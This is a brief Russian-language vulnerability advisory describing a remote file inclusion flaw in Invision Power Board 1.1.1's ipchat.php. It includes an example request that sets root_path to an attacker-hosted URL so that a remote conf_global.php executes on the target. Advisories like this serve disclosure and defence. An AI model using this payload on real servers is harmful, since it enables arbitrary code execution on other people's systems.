Уязвимость включения файла обнаружена в Invision Power Board. Удаленный пользователь может выполнить произвольный PHP код и команды операционной системы на уязвимом сервере. 

Сценарий ipchat.php включает файл conf_global.php через переменную $root_path, но не проверяет правильность местоположения файла. 

Удаленный пользователь может определить удаленное местоположение для $root_path переменной, чтобы включить удаленно расположенный файл conf_global.php, который будет выполнен на целевом сервере. Пример: 

http://[target]/ipchat.php?root_path=http://[attacker]/
http://[attacker]/conf_global.php

Уязвимость обнаружена в Invision Power Board 1.1.1.



Оставить мнение